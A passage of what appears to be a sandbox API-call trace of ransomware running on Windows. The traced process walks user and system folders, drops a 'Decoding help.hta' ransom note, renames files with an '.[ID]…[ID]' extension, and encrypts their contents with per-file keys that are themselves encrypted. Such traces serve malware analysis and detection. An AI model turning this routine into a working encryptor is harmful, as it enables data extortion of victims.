[0053.656] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*") returned 55 [0053.656] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\", lpString2="AssemblyList_4_extended.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml" [0053.656] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml" [0053.656] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.656] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_extended.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_extended.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.159] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_extended.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0058.159] CreateFileMappingA (hFile=0x6dc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x39c [0058.159] CryptAcquireContextA (in: phProv=0x380fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x380fcec*=0x344a0a0) returned 1 [0060.181] CryptGenKey (in: hProv=0x344a0a0, Algid=0x6610, dwFlags=0x1, phKey=0x380fce8 | out: phKey=0x380fce8*=0x5e3430) returned 1 [0060.181] CryptExportKey (in: hKey=0x5e3430, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x380fbe4, pdwDataLen=0x380fce4 | out: pbData=0x380fbe4*, pdwDataLen=0x380fce4*=0x2c) returned 1 [0060.181] MapViewOfFile (hFileMappingObject=0x39c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2000) returned 0x3a10000 [0062.639] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380fbe4*, pdwDataLen=0x380fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x380fbe4*, pdwDataLen=0x380fcf8*=0x100) returned 1 [0062.640] CryptEncrypt (in: hKey=0x5e3430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a10000, pdwDataLen=0x380fce4*=0x2000, dwBufLen=0x2000 | out: pbData=0x3a10000*, pdwDataLen=0x380fce4*=0x2000) returned 1 [0062.653] UnmapViewOfFile (lpBaseAddress=0x3a10000) returned 1 [0062.655] CloseHandle (hObject=0x39c) returned 1 [0062.655] CryptDestroyKey (hKey=0x5e3430) returned 1 [0062.655] CryptReleaseContext (hProv=0x344a0a0, dwFlags=0x0) returned 1 [0062.655] SetFilePointerEx (in: hFile=0x6dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.655] WriteFile (in: hFile=0x6dc, lpBuffer=0x380fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x380fcf8, lpOverlapped=0x0 | out: lpBuffer=0x380fbe4*, lpNumberOfBytesWritten=0x380fcf8*=0x100, lpOverlapped=0x0) returned 1 [0062.657] WriteFile (in: hFile=0x6dc, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x380fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x380fcf8*=0x500, lpOverlapped=0x0) returned 1 [0062.657] CloseHandle (hObject=0x6dc) returned 1 [0062.657] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0062.657] FindNextFileW (in: hFindFile=0x5d80d0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc643900, ftCreationTime.dwHighDateTime=0x1cac666, ftLastAccessTime.dwLowDateTime=0x9ea84660, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xdc643900, ftLastWriteTime.dwHighDateTime=0x1cac666, nFileSizeHigh=0x0, nFileSizeLow=0x201c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssemblyList_4_extended.xml", cAlternateFileName="ASSEMB~2.XML")) returned 0 [0062.657] FindClose (in: hFindFile=0x5d80d0 | out: hFindFile=0x5d80d0) returned 1 Thread: id = 219 os_tid = 0x808 [0040.509] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\*.*", lpFindFileData=0x1078fd30 | out: lpFindFileData=0x1078fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5e70 [0040.510] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.510] FindNextFileW (in: hFindFile=0x5a5e70, lpFindFileData=0x1078fd30 | out: lpFindFileData=0x1078fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.510] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.510] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.510] FindNextFileW (in: hFindFile=0x5a5e70, lpFindFileData=0x1078fd30 | out: lpFindFileData=0x1078fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.510] lstrcpyW (in: lpString1=0x9a63000, lpString2="\\\\?\\C:\\Users\\Public\\Downloads\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\*.*") returned="\\\\?\\C:\\Users\\Public\\Downloads\\*.*" [0040.510] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Downloads\\*.*") returned 33 [0040.510] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Public\\Downloads\\Decoding help.hta" [0040.510] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\Decoding help.hta" (normalized: "c:\\users\\public\\downloads\\decoding help.hta")) returned 0xffffffff [0040.510] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\Decoding help.hta" (normalized: "c:\\users\\public\\downloads\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0040.795] WriteFile (in: hFile=0x334, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1078fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1078fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.796] CloseHandle (hObject=0x334) returned 1 [0040.796] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.251] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0041.251] lstrlenW (lpString="desktop.ini") returned 11 [0041.251] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Downloads\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\*.*") returned="\\\\?\\C:\\Users\\Public\\Downloads\\*.*" [0041.251] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Downloads\\*.*") returned 33 [0041.251] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" [0041.251] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" [0041.251] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0041.251] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\downloads\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\downloads\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0041.252] CreateFileMappingA (hFile=0x418, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x41c [0041.252] CryptAcquireContextA (in: phProv=0x1078fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1078fcec*=0x3449688) returned 1 [0043.832] CryptGenKey (in: hProv=0x3449688, Algid=0x6610, dwFlags=0x1, phKey=0x1078fce8 | out: phKey=0x1078fce8*=0x5d8750) returned 1 [0043.832] CryptExportKey (in: hKey=0x5d8750, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1078fbe4, pdwDataLen=0x1078fce4 | out: pbData=0x1078fbe4*, pdwDataLen=0x1078fce4*=0x2c) returned 1 [0043.832] MapViewOfFile (hFileMappingObject=0x41c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa0) returned 0x44a0000 [0044.189] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1078fbe4*, pdwDataLen=0x1078fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1078fbe4*, pdwDataLen=0x1078fcf8*=0x100) returned 1 [0047.236] CryptEncrypt (in: hKey=0x5d8750, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44a0000*, pdwDataLen=0x1078fce4*=0xa0, dwBufLen=0xa0 | out: pbData=0x44a0000*, pdwDataLen=0x1078fce4*=0xa0) returned 1 [0047.236] UnmapViewOfFile (lpBaseAddress=0x44a0000) returned 1 [0047.238] CloseHandle (hObject=0x41c) returned 1 [0047.238] CryptDestroyKey (hKey=0x5d8750) returned 1 [0047.238] CryptReleaseContext (hProv=0x3449688, dwFlags=0x0) returned 1 [0047.238] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.238] WriteFile (in: hFile=0x418, lpBuffer=0x1078fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1078fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1078fbe4*, lpNumberOfBytesWritten=0x1078fcf8*=0x100, lpOverlapped=0x0) returned 1 [0047.618] WriteFile (in: hFile=0x418, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1078fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1078fcf8*=0x500, lpOverlapped=0x0) returned 1 [0047.618] CloseHandle (hObject=0x418) returned 1 [0047.618] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0050.368] FindNextFileW (in: hFindFile=0x5a5e70, lpFindFileData=0x1078fd30 | out: lpFindFileData=0x1078fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0050.368] FindClose (in: hFindFile=0x5a5e70 | out: hFindFile=0x5a5e70) returned 1 Thread: id = 220 os_tid = 0x804 [0040.511] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\*.*", lpFindFileData=0x1189fd30 | out: lpFindFileData=0x1189fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d88d0 [0042.046] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.046] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x1189fd30 | out: lpFindFileData=0x1189fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.046] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.046] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.046] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x1189fd30 | out: lpFindFileData=0x1189fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8.0", cAlternateFileName="")) returned 1 [0042.046] lstrcmpW (lpString1=".", lpString2="8.0") returned -1 [0042.047] lstrcmpW (lpString1="..", lpString2="8.0") returned -1 [0042.047] lstrcmpiW (lpString1="windows", lpString2="8.0") returned 1 [0042.047] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\*.*" [0042.047] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\*.*") returned 37 [0042.047] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\", lpString2="8.0" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0" [0042.047] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\*.*" [0042.047] GlobalMemoryStatus (in: lpBuffer=0x1189fd10 | out: lpBuffer=0x1189fd10) [0042.047] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x107f01e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x504 [0042.048] CloseHandle (hObject=0x504) returned 1 [0042.048] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x1189fd30 | out: lpFindFileData=0x1189fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8.0", cAlternateFileName="")) returned 0 [0042.048] FindClose (in: hFindFile=0x5d88d0 | out: hFindFile=0x5d88d0) returned 1 Thread: id = 221 os_tid = 0x56c [0040.511] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\My Documents\\*.*", lpFindFileData=0x119dfd30 | out: lpFindFileData=0x119dfd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 222 os_tid = 0x41c [0040.512] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\*.*", lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5eb0 [0040.513] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.513] FindNextFileW (in: hFindFile=0x5a5eb0, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.513] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.513] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.513] FindNextFileW (in: hFindFile=0x5a5eb0, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0040.513] FindClose (in: hFindFile=0x5a5eb0 | out: hFindFile=0x5a5eb0) returned 1 Thread: id = 223 os_tid = 0x6d0 [0040.514] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*.*", lpFindFileData=0x728fd30 | out: lpFindFileData=0x728fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7d50 [0041.945] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.945] FindNextFileW (in: hFindFile=0x5d7d50, lpFindFileData=0x728fd30 | out: lpFindFileData=0x728fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.945] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.945] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.945] FindNextFileW (in: hFindFile=0x5d7d50, lpFindFileData=0x728fd30 | out: lpFindFileData=0x728fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 1 [0041.945] lstrcmpW (lpString1=".", lpString2="BreadcrumbStore") returned -1 [0041.945] lstrcmpW (lpString1="..", lpString2="BreadcrumbStore") returned -1 [0041.945] lstrcmpiW (lpString1="windows", lpString2="BreadcrumbStore") returned 1 [0041.947] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*.*" [0041.947] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*.*") returned 45 [0041.947] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\", lpString2="BreadcrumbStore" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore" [0041.947] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*" [0041.947] GlobalMemoryStatus (in: lpBuffer=0x728fd10 | out: lpBuffer=0x728fd10) [0041.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x114850b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4a8 [0041.948] CloseHandle (hObject=0x4a8) returned 1 [0041.948] FindNextFileW (in: hFindFile=0x5d7d50, lpFindFileData=0x728fd30 | out: lpFindFileData=0x728fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 0 [0041.948] FindClose (in: hFindFile=0x5d7d50 | out: hFindFile=0x5d7d50) returned 1 Thread: id = 224 os_tid = 0x534 [0043.218] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\NetHood\\*.*", lpFindFileData=0x11b1fd30 | out: lpFindFileData=0x11b1fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 225 os_tid = 0x738 [0040.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\*.*", lpFindFileData=0x11c5fd30 | out: lpFindFileData=0x11c5fd30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5eb0 [0040.515] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.515] FindNextFileW (in: hFindFile=0x5a5eb0, lpFindFileData=0x11c5fd30 | out: lpFindFileData=0x11c5fd30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, 